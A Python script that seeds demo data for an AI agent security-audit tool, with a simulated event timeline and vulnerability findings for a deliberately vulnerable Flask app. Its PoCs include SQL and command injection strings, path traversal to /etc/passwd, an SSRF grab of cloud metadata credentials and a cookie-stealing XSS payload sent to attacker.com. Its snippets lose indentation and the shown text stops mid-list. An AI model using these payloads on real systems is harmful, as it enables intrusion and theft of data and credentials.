CodeReview/backend/scripts/create_agent_demo_data.py

1297 lines
50 KiB
Python
Raw Normal View History

#!/usr/bin/env python3
"""
Create demo data for an Agent audit task.

Used to generate a sample for showcasing the HTML report.

Usage:
    cd backend && python -m scripts.create_agent_demo_data
"""
import asyncio
import json
import uuid
import sys
import os
from datetime import datetime, timedelta, timezone
# 添加backend目录到路径
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from sqlalchemy.ext.asyncio import create_async_engine, AsyncSession
from sqlalchemy.orm import sessionmaker
from sqlalchemy.future import select
from app.core.config import settings
from app.models.user import User
from app.models.project import Project
from app.models.agent_task import (
AgentTask, AgentEvent, AgentFinding, AgentTreeNode, AgentCheckpoint,
AgentTaskStatus, AgentTaskPhase, AgentEventType,
VulnerabilitySeverity, VulnerabilityType, FindingStatus
)
# Demo data configuration: the names used below to look up (and create) the
# demo project and the demo audit task.
DEMO_PROJECT_NAME = "VulnWebApp - 安全演示项目"
DEMO_TASK_NAME = "智能漏洞挖掘审计 - 完整示例"
async def get_or_create_demo_project(db: AsyncSession, user_id: str) -> Project:
    """Return the demo project, inserting it first when no row carries its name.

    Args:
        db: Async session used for the lookup and, if needed, the insert.
        user_id: Stored as ``owner_id`` on a newly created project.

    Returns:
        The existing project, or the newly added one after a flush.
        Nothing is committed here.
    """
    lookup = select(Project).where(Project.name == DEMO_PROJECT_NAME)
    found = (await db.execute(lookup)).scalars().first()
    if found:
        print(f"演示项目已存在: {found.name}")
        return found

    # No project with the demo name yet: build one back-dated by a week.
    created = Project(
        name=DEMO_PROJECT_NAME,
        description="用于演示 Agent 智能审计功能的示例 Web 应用项目，包含多种常见安全漏洞",
        source_type="zip",
        owner_id=user_id,
        is_active=True,
        default_branch="main",
        programming_languages=json.dumps(["Python", "JavaScript", "SQL"]),
        created_at=datetime.now(timezone.utc) - timedelta(days=7),
    )
    db.add(created)
    await db.flush()
    print(f"✓ 创建演示项目: {created.name}")
    return created
async def create_agent_demo_task(db: AsyncSession, project: Project, user_id: str) -> AgentTask:
    """Insert a completed demo ``AgentTask`` for ``project``.

    The first existing task named ``DEMO_TASK_NAME`` (if any) is deleted and
    flushed before the new row is built. The new task is stamped as started
    15 minutes ago and completed 2 minutes ago.

    Args:
        db: Async session used for the lookup, delete and insert.
        project: Project whose ``id`` the task is attached to.
        user_id: Stored as ``created_by`` on the task.

    Returns:
        The newly added task after a flush (not committed).
    """
    previous = (
        await db.execute(select(AgentTask).where(AgentTask.name == DEMO_TASK_NAME))
    ).scalars().first()
    if previous:
        print(f"删除已存在的演示任务: {previous.id}")
        await db.delete(previous)
        await db.flush()

    now = datetime.now(timezone.utc)
    started = now - timedelta(minutes=15)
    finished = now - timedelta(minutes=2)

    # Identity and ownership.
    identity = dict(
        id=str(uuid.uuid4()),
        project_id=project.id,
        created_by=user_id,
        name=DEMO_TASK_NAME,
        description="对 VulnWebApp 进行全面的安全漏洞扫描，包括 SQL 注入、XSS、命令注入等常见漏洞类型的检测与验证",
        task_type="agent_audit",
    )
    # Audit scope configuration.
    scope = dict(
        audit_scope={"include": ["**/*.py", "**/*.js", "**/*.html"], "exclude": ["tests/*", "node_modules/*"]},
        target_vulnerabilities=["sql_injection", "xss", "command_injection", "path_traversal", "ssrf", "hardcoded_secret"],
        verification_level="sandbox",
        branch_name="main",
        exclude_patterns=["*.test.py", "*.spec.js", "__pycache__/*"],
    )
    # LLM / agent configuration and budgets.
    runtime = dict(
        llm_config={"provider": "openai", "model": "gpt-4", "temperature": 0.1},
        agent_config={"max_depth": 3, "enable_verification": True, "enable_poc_generation": True},
        max_iterations=50,
        token_budget=100000,
        timeout_seconds=1800,
    )
    # Final state of the run.
    state = dict(
        status=AgentTaskStatus.COMPLETED,
        current_phase=AgentTaskPhase.REPORTING,
        current_step="报告生成完成",
    )
    # Progress, agent, finding and severity counters, plus scores.
    metrics = dict(
        total_files=48,
        indexed_files=48,
        analyzed_files=48,
        total_chunks=156,
        total_iterations=32,
        tool_calls_count=87,
        tokens_used=45680,
        findings_count=8,
        verified_count=6,
        false_positive_count=1,
        critical_count=2,
        high_count=3,
        medium_count=2,
        low_count=1,
        quality_score=72.5,
        security_score=35.8,
    )
    # Audit plan shown alongside the task.
    plan = {
        "phases": [
            {"name": "代码索引", "description": "建立代码向量索引，支持语义检索"},
            {"name": "入口点识别", "description": "识别用户输入入口点和敏感API"},
            {"name": "漏洞模式匹配", "description": "基于已知漏洞模式进行检测"},
            {"name": "数据流分析", "description": "追踪污点数据流，验证漏洞可达性"},
            {"name": "沙箱验证", "description": "在隔离环境中验证漏洞可利用性"},
            {"name": "PoC 生成", "description": "为已验证漏洞生成概念验证代码"},
        ],
        "focus_areas": ["用户认证模块", "数据库查询接口", "文件上传功能", "API 端点"],
    }
    # Timestamps: the row is created one minute before the run starts.
    timestamps = dict(
        created_at=started - timedelta(minutes=1),
        started_at=started,
        completed_at=finished,
    )

    task = AgentTask(
        **identity,
        **scope,
        **runtime,
        **state,
        **metrics,
        audit_plan=plan,
        **timestamps,
    )
    db.add(task)
    await db.flush()
    print(f"✓ 创建 Agent 任务: {task.id}")
    return task
async def create_agent_events(db: AsyncSession, task: AgentTask) -> list:
    """Create the demo event stream for ``task``.

    The events are described as a timeline table and turned into
    ``AgentEvent`` rows in one pass. Each row gets a fresh UUID, a 1-based
    ``sequence`` number in table order, and a ``created_at`` equal to
    ``task.started_at`` plus the row's offset in seconds.

    Args:
        db: Async session the events are added to and flushed on.
        task: Task the events belong to; supplies ``id``, ``started_at`` and
            ``target_vulnerabilities``.

    Returns:
        The list of created events, in sequence order (flushed, not committed).
    """
    E, P = AgentEventType, AgentTaskPhase
    base_time = task.started_at

    def hit(vuln_type, severity, file, line):
        """Build the extras for a FINDING_NEW row (metadata only)."""
        return {"metadata": {"vulnerability_type": vuln_type, "severity": severity, "file": file, "line": line}}

    # Each row: (offset seconds, event type, phase, message, optional extras).
    # Extras may carry tool_name / tool_input / tool_output / tool_duration_ms /
    # tokens_used / metadata; anything absent falls back to None (tokens: 0).
    timeline = [
        # ---------- task start ----------
        (0, E.TASK_START, None, "Agent 审计任务启动，开始智能漏洞挖掘",
         {"metadata": {"target_vulnerabilities": task.target_vulnerabilities}}),
        # ---------- planning phase ----------
        (5, E.PHASE_START, P.PLANNING, "进入规划阶段 - 分析项目结构，制定审计策略", {}),
        (10, E.THINKING, P.PLANNING,
         "分析项目结构：检测到 Flask Web 应用框架，包含用户认证、数据库操作、文件处理等模块。重点关注 SQL 注入、XSS、命令注入等高危漏洞。",
         {"tokens_used": 450}),
        (15, E.PLANNING, P.PLANNING,
         "制定审计计划1) 索引代码库 2) 识别入口点 3) 模式匹配检测 4) 数据流分析 5) 沙箱验证 6) 生成报告",
         {"tokens_used": 380}),
        (20, E.PHASE_COMPLETE, P.PLANNING, "规划阶段完成，识别出 12 个高优先级检查点", {}),
        # ---------- indexing phase ----------
        (25, E.PHASE_START, P.INDEXING, "进入索引阶段 - 构建代码向量索引", {}),
        (30, E.TOOL_CALL, P.INDEXING, "调用 RAG 索引工具，处理源代码文件",
         {"tool_name": "rag_index",
          "tool_input": {"paths": ["app/", "routes/", "models/", "utils/"], "chunk_size": 1500}}),
        (45, E.RAG_RESULT, P.INDEXING, "代码索引完成48 个文件156 个代码块，向量维度 1536",
         {"tool_name": "rag_index",
          "tool_output": {"files_indexed": 48, "chunks_created": 156, "vector_dim": 1536},
          "tool_duration_ms": 8500}),
        (50, E.PHASE_COMPLETE, P.INDEXING, "索引阶段完成", {}),
        # ---------- analysis phase ----------
        (55, E.PHASE_START, P.ANALYSIS, "进入分析阶段 - 执行漏洞检测", {}),
        # SQL injection detection
        (60, E.THINKING, P.ANALYSIS,
         "开始检测 SQL 注入漏洞：搜索数据库查询相关代码，识别用户输入拼接到 SQL 语句的模式",
         {"tokens_used": 320}),
        (65, E.RAG_QUERY, P.ANALYSIS, "语义检索：查找 SQL 查询和用户输入处理代码",
         {"tool_name": "rag_search",
          "tool_input": {"query": "SQL query user input parameter database execute", "top_k": 10}}),
        (70, E.TOOL_CALL, P.ANALYSIS, "读取文件: app/routes/user.py",
         {"tool_name": "read_file",
          "tool_input": {"path": "app/routes/user.py", "start_line": 45, "end_line": 80}}),
        (80, E.FINDING_NEW, P.ANALYSIS, "发现 SQL 注入漏洞 [Critical]",
         hit("sql_injection", "critical", "app/routes/user.py", 52)),
        # XSS detection
        (120, E.THINKING, P.ANALYSIS, "开始检测 XSS 漏洞：搜索 HTML 渲染和用户输入输出相关代码",
         {"tokens_used": 280}),
        (130, E.TOOL_CALL, P.ANALYSIS, "读取文件: app/templates/comment.html",
         {"tool_name": "read_file", "tool_input": {"path": "app/templates/comment.html"}}),
        (145, E.FINDING_NEW, P.ANALYSIS, "发现存储型 XSS 漏洞 [High]",
         hit("xss", "high", "app/templates/comment.html", 28)),
        # Command injection detection
        (180, E.RAG_QUERY, P.ANALYSIS, "语义检索：查找系统命令执行相关代码",
         {"tool_name": "rag_search",
          "tool_input": {"query": "os.system subprocess shell command execute", "top_k": 10}}),
        (210, E.FINDING_NEW, P.ANALYSIS, "发现命令注入漏洞 [Critical]",
         hit("command_injection", "critical", "app/utils/backup.py", 34)),
        # Path traversal detection
        (250, E.TOOL_CALL, P.ANALYSIS, "分析文件操作代码",
         {"tool_name": "analyze_code",
          "tool_input": {"pattern": "file path user input", "scope": "app/routes/"}}),
        (280, E.FINDING_NEW, P.ANALYSIS, "发现路径遍历漏洞 [High]",
         hit("path_traversal", "high", "app/routes/download.py", 18)),
        # SSRF detection
        (320, E.FINDING_NEW, P.ANALYSIS, "发现 SSRF 漏洞 [High]",
         hit("ssrf", "high", "app/routes/proxy.py", 42)),
        # Hard-coded secret detection
        (360, E.TOOL_CALL, P.ANALYSIS, "扫描硬编码密钥和敏感信息",
         {"tool_name": "secret_scan",
          "tool_input": {"patterns": ["api_key", "password", "secret", "token"]}}),
        (380, E.FINDING_NEW, P.ANALYSIS, "发现硬编码 API 密钥 [Medium]",
         hit("hardcoded_secret", "medium", "app/config.py", 15)),
        (400, E.FINDING_NEW, P.ANALYSIS, "发现弱加密配置 [Medium]",
         hit("weak_crypto", "medium", "app/utils/crypto.py", 8)),
        (420, E.FINDING_NEW, P.ANALYSIS, "发现调试模式未关闭 [Low]",
         hit("security_misconfiguration", "low", "app/__init__.py", 25)),
        (450, E.PHASE_COMPLETE, P.ANALYSIS, "分析阶段完成，发现 8 个潜在漏洞", {}),
        # ---------- verification phase ----------
        (460, E.PHASE_START, P.VERIFICATION, "进入验证阶段 - 在沙箱环境中验证漏洞", {}),
        # SQL injection verification
        (470, E.SANDBOX_START, P.VERIFICATION, "启动沙箱环境验证 SQL 注入漏洞",
         {"tool_name": "sandbox"}),
        (480, E.SANDBOX_EXEC, P.VERIFICATION, "执行 SQL 注入 PoC' OR '1'='1' --",
         {"tool_name": "sandbox",
          "tool_input": {"payload": "' OR '1'='1' --", "target": "/api/user/search?name="}}),
        (490, E.SANDBOX_RESULT, P.VERIFICATION, "SQL 注入验证成功 - 成功绕过认证获取所有用户数据",
         {"tool_name": "sandbox",
          "tool_output": {"success": True, "response_code": 200, "data_leaked": True},
          "tool_duration_ms": 1200}),
        (495, E.FINDING_VERIFIED, P.VERIFICATION, "SQL 注入漏洞已验证 [Critical]", {}),
        # Command injection verification
        (520, E.SANDBOX_EXEC, P.VERIFICATION, "执行命令注入 PoC; id; whoami",
         {"tool_name": "sandbox",
          "tool_input": {"payload": "; id; whoami", "target": "/api/backup?filename="}}),
        (535, E.SANDBOX_RESULT, P.VERIFICATION, "命令注入验证成功 - 成功执行任意系统命令",
         {"tool_name": "sandbox",
          "tool_output": {"success": True, "output": "uid=1000(www-data) gid=1000(www-data)"},
          "tool_duration_ms": 800}),
        (540, E.FINDING_VERIFIED, P.VERIFICATION, "命令注入漏洞已验证 [Critical]", {}),
        # XSS verification
        (560, E.SANDBOX_EXEC, P.VERIFICATION, "执行 XSS PoC<script>alert('XSS')</script>",
         {"tool_name": "sandbox",
          "tool_input": {"payload": "<script>alert('XSS')</script>", "target": "/api/comment"}}),
        (580, E.FINDING_VERIFIED, P.VERIFICATION, "存储型 XSS 漏洞已验证 [High]", {}),
        # Path traversal verification
        (600, E.SANDBOX_EXEC, P.VERIFICATION, "执行路径遍历 PoC../../../etc/passwd",
         {"tool_name": "sandbox",
          "tool_input": {"payload": "../../../etc/passwd", "target": "/api/download?file="}}),
        (620, E.FINDING_VERIFIED, P.VERIFICATION, "路径遍历漏洞已验证 [High]", {}),
        # SSRF verification
        (640, E.SANDBOX_EXEC, P.VERIFICATION, "执行 SSRF PoChttp://169.254.169.254/latest/meta-data/",
         {"tool_name": "sandbox",
          "tool_input": {"payload": "http://169.254.169.254/latest/meta-data/", "target": "/api/proxy?url="}}),
        (660, E.FINDING_VERIFIED, P.VERIFICATION, "SSRF 漏洞已验证 [High]", {}),
        # False-positive elimination
        (680, E.THINKING, P.VERIFICATION, "验证硬编码密钥：检查是否为测试/示例配置",
         {"tokens_used": 180}),
        (700, E.FINDING_FALSE_POSITIVE, P.VERIFICATION, "硬编码密钥为误报 - 该文件为示例配置模板",
         {"metadata": {"reason": "File is example configuration template, not production code"}}),
        (720, E.PHASE_COMPLETE, P.VERIFICATION, "验证阶段完成6 个漏洞已验证1 个误报已排除", {}),
        # ---------- reporting phase ----------
        (730, E.PHASE_START, P.REPORTING, "进入报告阶段 - 生成安全审计报告", {}),
        (740, E.TOOL_CALL, P.REPORTING, "生成漏洞详情和修复建议",
         {"tool_name": "generate_report",
          "tool_input": {"format": "html", "include_poc": True, "include_fix": True}}),
        (760, E.INFO, P.REPORTING, "报告生成完成：包含 8 个发现、6 个已验证漏洞、详细修复建议和 PoC 代码", {}),
        (770, E.PHASE_COMPLETE, P.REPORTING, "报告阶段完成", {}),
        # ---------- task complete ----------
        (780, E.TASK_COMPLETE, None,
         "Agent 审计任务完成！发现 8 个安全问题，其中 2 个严重、3 个高危、2 个中危、1 个低危",
         {"metadata": {
             "total_findings": 8,
             "verified": 6,
             "false_positives": 1,
             "severity_distribution": {"critical": 2, "high": 3, "medium": 2, "low": 1},
             "duration_seconds": 780,
             "tokens_used": 45680,
         }}),
    ]

    events = []
    for seq, (offset, kind, phase, message, extra) in enumerate(timeline, start=1):
        events.append(
            AgentEvent(
                id=str(uuid.uuid4()),
                task_id=task.id,
                event_type=kind,
                phase=phase,
                message=message,
                tool_name=extra.get("tool_name"),
                tool_input=extra.get("tool_input"),
                tool_output=extra.get("tool_output"),
                tool_duration_ms=extra.get("tool_duration_ms"),
                finding_id=None,  # no demo event is linked to a finding row
                tokens_used=extra.get("tokens_used", 0),
                event_metadata=extra.get("metadata"),
                sequence=seq,
                created_at=base_time + timedelta(seconds=offset),
            )
        )

    # Save the whole batch, then flush once.
    for event in events:
        db.add(event)
    await db.flush()
    print(f"✓ 创建了 {len(events)} 个 Agent 事件")
    return events
async def create_agent_findings(db: AsyncSession, task: AgentTask) -> list:
    """Create the demo vulnerability findings for ``task``.

    Eight findings are built from the literal data below. Finding ``i`` is
    stamped as created ``5 + i`` minutes after ``task.started_at``. Verified
    findings get ``verified_at`` at ``10 + i`` minutes after the start,
    clamped so it never falls after ``task.completed_at``.

    Args:
        db: Async session the findings are added to and flushed on.
        task: Task the findings belong to; supplies ``id``, ``started_at``
            and ``completed_at``.

    Returns:
        The list of created findings (flushed, not committed).
    """
    findings_data = [
        {
            "vulnerability_type": VulnerabilityType.SQL_INJECTION,
            "severity": VulnerabilitySeverity.CRITICAL,
            "title": "用户搜索接口存在 SQL 注入漏洞",
            "description": "在 /api/user/search 接口中，用户输入的 name 参数直接拼接到 SQL 查询语句中，未经过任何过滤或参数化处理，攻击者可以通过构造恶意输入执行任意 SQL 语句。",
            "file_path": "app/routes/user.py",
            "line_start": 52,
            "line_end": 58,
            "function_name": "search_user",
            "code_snippet": '''@app.route('/api/user/search')
def search_user():
name = request.args.get('name', '')
# 危险直接拼接用户输入到SQL语句
query = f"SELECT * FROM users WHERE name LIKE '%{name}%'"
result = db.execute(query)
return jsonify(result.fetchall())''',
            "source": "request.args.get('name')",
            "sink": "db.execute(query)",
            "dataflow_path": [
                {"step": 1, "location": "line 54", "description": "用户输入从 request.args.get() 获取"},
                {"step": 2, "location": "line 56", "description": "用户输入直接拼接到 SQL 字符串"},
                {"step": 3, "location": "line 57", "description": "拼接后的 SQL 被执行"},
            ],
            "status": FindingStatus.VERIFIED,
            "is_verified": True,
            "verification_method": "沙箱验证 - 成功执行 SQL 注入攻击",
            "verification_result": {"success": True, "payload": "' OR '1'='1' --", "impact": "绕过认证，获取所有用户数据"},
            "has_poc": True,
            "poc_code": '''import requests
# SQL 注入 PoC
target_url = "http://target.com/api/user/search"
# Payload: 绕过认证获取所有用户
payload = "' OR '1'='1' --"
response = requests.get(target_url, params={"name": payload})
print(f"Status: {response.status_code}")
print(f"Data: {response.json()}")
# 预期结果：返回所有用户数据，而非仅匹配搜索条件的用户''',
            "poc_description": "通过在 name 参数中注入 SQL 语句，绕过查询条件获取数据库中所有用户信息",
            "poc_steps": [
                "访问目标 URL: /api/user/search?name=' OR '1'='1' --",
                "观察响应：应返回所有用户数据",
                "进一步利用：可尝试 UNION 注入获取其他表数据",
            ],
            "suggestion": "使用参数化查询或 ORM 框架来防止 SQL 注入",
            "fix_code": '''@app.route('/api/user/search')
def search_user():
name = request.args.get('name', '')
# 修复：使用参数化查询
query = "SELECT * FROM users WHERE name LIKE :name"
result = db.execute(query, {"name": f"%{name}%"})
return jsonify(result.fetchall())''',
            "fix_description": "使用 SQLAlchemy 的参数化查询功能，将用户输入作为参数传递，而非直接拼接到 SQL 语句中",
            "references": [
                {"type": "CWE", "id": "CWE-89", "url": "https://cwe.mitre.org/data/definitions/89.html"},
                {"type": "OWASP", "id": "A03:2021", "url": "https://owasp.org/Top10/A03_2021-Injection/"},
            ],
            "ai_explanation": "这是一个典型的 SQL 注入漏洞。代码直接将用户输入拼接到 SQL 查询字符串中，没有进行任何转义或参数化处理。攻击者可以通过特殊字符（如单引号）闭合原有的 SQL 语句，然后注入自己的 SQL 代码。",
            "ai_confidence": 0.98,
            "xai_what": "SQL 注入是一种代码注入技术，攻击者通过在输入字段中插入恶意 SQL 代码来操纵数据库查询。",
            "xai_why": "该漏洞存在是因为开发者直接将用户输入拼接到 SQL 语句中，没有使用参数化查询或进行输入验证。",
            "xai_how": "攻击者可以在 name 参数中输入 ' OR '1'='1' -- 来绕过查询条件，或使用 UNION SELECT 来获取其他表的数据。",
            "xai_impact": "攻击者可以1) 绕过认证 2) 读取敏感数据 3) 修改或删除数据 4) 在某些情况下执行系统命令。",
            "cvss_score": 9.8,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "tags": ["owasp-top10", "injection", "database", "authentication-bypass"],
        },
        {
            "vulnerability_type": VulnerabilityType.COMMAND_INJECTION,
            "severity": VulnerabilitySeverity.CRITICAL,
            "title": "备份功能存在命令注入漏洞",
            "description": "在备份功能中，用户提供的文件名参数直接传递给 os.system() 函数执行，攻击者可以通过命令分隔符（如 ; 或 |）注入任意系统命令。",
            "file_path": "app/utils/backup.py",
            "line_start": 34,
            "line_end": 40,
            "function_name": "create_backup",
            "code_snippet": '''def create_backup(filename):
"""创建备份文件"""
# 危险：直接将用户输入传递给系统命令
backup_path = f"/backups/{filename}.tar.gz"
cmd = f"tar -czf {backup_path} /data/"
os.system(cmd) # 命令注入风险
return backup_path''',
            "source": "filename 参数",
            "sink": "os.system(cmd)",
            "dataflow_path": [
                {"step": 1, "location": "line 34", "description": "filename 参数从外部传入"},
                {"step": 2, "location": "line 36", "description": "filename 拼接到 shell 命令"},
                {"step": 3, "location": "line 37", "description": "命令通过 os.system() 执行"},
            ],
            "status": FindingStatus.VERIFIED,
            "is_verified": True,
            "verification_method": "沙箱验证 - 成功执行任意命令",
            "verification_result": {"success": True, "payload": "; id; whoami", "output": "uid=1000(www-data)"},
            "has_poc": True,
            "poc_code": '''import requests
# 命令注入 PoC
target_url = "http://target.com/api/backup"
# Payload: 注入系统命令
payload = "test; id; cat /etc/passwd"
response = requests.post(target_url, json={"filename": payload})
print(f"Response: {response.text}")
# 预期结果：服务器执行 id 和 cat /etc/passwd 命令''',
            "poc_description": "通过在 filename 参数中注入分号和系统命令，在服务器上执行任意代码",
            "poc_steps": [
                "构造恶意 filename: test; id; cat /etc/passwd",
                "发送请求到 /api/backup 接口",
                "观察服务器响应或日志中的命令执行结果",
            ],
            "suggestion": "避免使用 os.system()，改用 subprocess 模块并禁用 shell=True对用户输入进行严格的白名单验证",
            "fix_code": '''import subprocess
import re
def create_backup(filename):
"""创建备份文件 - 安全版本"""
# 修复：验证文件名只包含安全字符
if not re.match(r'^[a-zA-Z0-9_-]+$', filename):
raise ValueError("Invalid filename")
backup_path = f"/backups/{filename}.tar.gz"
# 修复：使用 subprocess 并传递参数列表
subprocess.run(
["tar", "-czf", backup_path, "/data/"],
check=True,
shell=False # 禁用shell
)
return backup_path''',
            "fix_description": "1) 使用正则表达式验证文件名只包含安全字符 2) 使用 subprocess.run() 替代 os.system() 3) 禁用 shell 模式，将参数作为列表传递",
            "references": [
                {"type": "CWE", "id": "CWE-78", "url": "https://cwe.mitre.org/data/definitions/78.html"},
                {"type": "OWASP", "id": "A03:2021", "url": "https://owasp.org/Top10/A03_2021-Injection/"},
            ],
            "ai_explanation": "这是一个严重的命令注入漏洞。os.system() 函数会通过 shell 执行命令，当用户输入被直接拼接到命令字符串中时，攻击者可以使用 shell 的特殊字符（如 ;、|、&&）来注入额外的命令。",
            "ai_confidence": 0.99,
            "xai_what": "命令注入允许攻击者在目标系统上执行任意操作系统命令。",
            "xai_why": "该漏洞存在是因为用户输入直接拼接到 shell 命令中，没有进行任何过滤或转义。",
            "xai_how": "攻击者可以在 filename 参数中输入 ; rm -rf / 来删除服务器文件，或执行反弹 shell 获取服务器控制权。",
            "xai_impact": "完全的服务器控制权，包括：读取敏感文件、安装后门、横向移动、数据窃取、服务中断等。",
            "cvss_score": 10.0,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "tags": ["owasp-top10", "injection", "rce", "critical"],
        },
        {
            "vulnerability_type": VulnerabilityType.XSS,
            "severity": VulnerabilitySeverity.HIGH,
            "title": "评论功能存在存储型 XSS 漏洞",
            "description": "用户提交的评论内容在展示时未经 HTML 转义直接渲染，攻击者可以在评论中注入恶意 JavaScript 代码，当其他用户查看评论时会执行这些代码。",
            "file_path": "app/templates/comment.html",
            "line_start": 28,
            "line_end": 32,
            "function_name": None,
            "code_snippet": '''<div class="comment-list">
{% for comment in comments %}
<div class="comment-item">
<p class="comment-content">{{ comment.content | safe }}</p>
<!-- 危险使用 safe 过滤器禁用了自动转义 -->
</div>
{% endfor %}
</div>''',
            "source": "comment.content (用户提交的评论)",
            "sink": "{{ comment.content | safe }}",
            "status": FindingStatus.VERIFIED,
            "is_verified": True,
            "verification_method": "沙箱验证 - XSS payload 成功执行",
            "verification_result": {"success": True, "payload": "<script>alert('XSS')</script>"},
            "has_poc": True,
            "poc_code": """import requests
# 存储型 XSS PoC
target_url = "http://target.com/api/comment"
# Payload: 窃取用户 Cookie
payload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'
response = requests.post(target_url, json={"content": payload})
print(f"Comment posted: {response.status_code}")
# 当其他用户访问评论页面时，恶意脚本会自动执行""",
            "poc_description": "通过在评论中注入 JavaScript 代码，当其他用户查看页面时窃取其 Cookie",
            "suggestion": "移除 safe 过滤器，让 Jinja2 自动转义 HTML 特殊字符",
            "fix_code": '''<div class="comment-list">
{% for comment in comments %}
<div class="comment-item">
<!-- 修复移除 safe 过滤器使用自动转义 -->
<p class="comment-content">{{ comment.content }}</p>
</div>
{% endfor %}
</div>''',
            "fix_description": "移除 | safe 过滤器，让 Jinja2 模板引擎自动对用户内容进行 HTML 转义",
            "references": [
                {"type": "CWE", "id": "CWE-79", "url": "https://cwe.mitre.org/data/definitions/79.html"},
                {"type": "OWASP", "id": "A03:2021", "url": "https://owasp.org/Top10/A03_2021-Injection/"},
            ],
            "ai_confidence": 0.96,
            "xai_what": "存储型 XSS 是指恶意脚本被永久存储在目标服务器上，当用户访问包含该脚本的页面时会自动执行。",
            "xai_why": "该漏洞存在是因为模板使用了 safe 过滤器，禁用了 Jinja2 的自动 HTML 转义功能。",
            "xai_how": "攻击者提交包含 <script> 标签的评论，当其他用户浏览评论时，恶意脚本会在其浏览器中执行。",
            "xai_impact": "会话劫持、钓鱼攻击、恶意重定向、键盘记录、加密货币挖矿等。",
            "cvss_score": 8.1,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
            "tags": ["owasp-top10", "xss", "stored-xss", "frontend"],
        },
        {
            "vulnerability_type": VulnerabilityType.PATH_TRAVERSAL,
            "severity": VulnerabilitySeverity.HIGH,
            "title": "文件下载接口存在路径遍历漏洞",
            "description": "文件下载接口直接使用用户提供的文件名参数构建文件路径，没有验证路径是否在允许的目录范围内，攻击者可以使用 ../ 序列访问任意文件。",
            "file_path": "app/routes/download.py",
            "line_start": 18,
            "line_end": 26,
            "function_name": "download_file",
            "code_snippet": '''@app.route('/api/download')
def download_file():
filename = request.args.get('file')
# 危险：直接拼接用户输入构建路径
file_path = os.path.join('/uploads/', filename)
if os.path.exists(file_path):
return send_file(file_path)
return "File not found", 404''',
            "source": "request.args.get('file')",
            "sink": "send_file(file_path)",
            "status": FindingStatus.VERIFIED,
            "is_verified": True,
            "verification_method": "沙箱验证 - 成功读取 /etc/passwd",
            "verification_result": {"success": True, "payload": "../../../etc/passwd", "file_read": True},
            "has_poc": True,
            "poc_code": '''import requests
# 路径遍历 PoC
target_url = "http://target.com/api/download"
# Payload: 读取系统敏感文件
payload = "../../../etc/passwd"
response = requests.get(target_url, params={"file": payload})
print(f"File content:\\n{response.text}")''',
            "suggestion": "使用 os.path.realpath() 解析路径后验证是否在允许的目录内",
            # NOTE: the containment test in this sample fix uses Path.parents
            # instead of a string-prefix check; a prefix check would accept
            # sibling directories such as /uploads_private.
            "fix_code": '''import os
from pathlib import Path
UPLOAD_DIR = Path('/uploads/').resolve()
@app.route('/api/download')
def download_file():
filename = request.args.get('file')
# 修复：解析真实路径并验证
file_path = (UPLOAD_DIR / filename).resolve()
# 确保文件在允许的目录内
if UPLOAD_DIR not in file_path.parents:
return "Access denied", 403
if file_path.exists():
return send_file(file_path)
return "File not found", 404''',
            "references": [
                {"type": "CWE", "id": "CWE-22", "url": "https://cwe.mitre.org/data/definitions/22.html"},
            ],
            "ai_confidence": 0.95,
            "cvss_score": 7.5,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "tags": ["path-traversal", "file-read", "lfi"],
        },
        {
            "vulnerability_type": VulnerabilityType.SSRF,
            "severity": VulnerabilitySeverity.HIGH,
            "title": "代理接口存在 SSRF 漏洞",
            "description": "代理接口接受用户提供的 URL 并发起请求，没有验证目标地址，攻击者可以利用此漏洞访问内网资源或云元数据服务。",
            "file_path": "app/routes/proxy.py",
            "line_start": 42,
            "line_end": 50,
            "function_name": "proxy_request",
            "code_snippet": '''@app.route('/api/proxy')
def proxy_request():
target_url = request.args.get('url')
# 危险：直接请求用户提供的 URL
response = requests.get(target_url)
return response.content''',
            "source": "request.args.get('url')",
            "sink": "requests.get(target_url)",
            "status": FindingStatus.VERIFIED,
            "is_verified": True,
            "verification_method": "沙箱验证 - 成功访问内网元数据服务",
            "verification_result": {"success": True, "payload": "http://169.254.169.254/latest/meta-data/"},
            "has_poc": True,
            "poc_code": '''import requests
# SSRF PoC - 访问 AWS 元数据
target_url = "http://target.com/api/proxy"
payload = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
response = requests.get(target_url, params={"url": payload})
print(f"AWS Credentials:\\n{response.text}")''',
            "suggestion": "实现 URL 白名单验证，禁止访问内网地址和元数据服务",
            "fix_code": '''from urllib.parse import urlparse
import ipaddress
ALLOWED_HOSTS = ['api.example.com', 'cdn.example.com']
def is_safe_url(url):
parsed = urlparse(url)
# 检查协议
if parsed.scheme not in ['http', 'https']:
return False
# 检查是否在白名单
if parsed.hostname not in ALLOWED_HOSTS:
return False
# 检查是否为内网地址
try:
ip = ipaddress.ip_address(parsed.hostname)
if ip.is_private or ip.is_loopback:
return False
except ValueError:
pass
return True
@app.route('/api/proxy')
def proxy_request():
target_url = request.args.get('url')
if not is_safe_url(target_url):
return "Invalid URL", 400
response = requests.get(target_url, timeout=5)
return response.content''',
            "references": [
                {"type": "CWE", "id": "CWE-918", "url": "https://cwe.mitre.org/data/definitions/918.html"},
                {"type": "OWASP", "id": "A10:2021", "url": "https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/"},
            ],
            "ai_confidence": 0.94,
            "cvss_score": 8.6,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
            "tags": ["owasp-top10", "ssrf", "cloud-metadata"],
        },
        {
            "vulnerability_type": VulnerabilityType.HARDCODED_SECRET,
            "severity": VulnerabilitySeverity.MEDIUM,
            "title": "发现硬编码的 API 密钥（误报）",
            "description": "在配置文件中发现硬编码的 API 密钥，经验证为示例配置模板中的占位符。",
            "file_path": "app/config.py.example",
            "line_start": 15,
            "line_end": 18,
            "code_snippet": '''# 示例配置文件 - 请复制为 config.py 并替换实际值
API_KEY = "your-api-key-here" # 请替换为实际密钥
SECRET_KEY = "change-this-secret" # 请替换为随机字符串''',
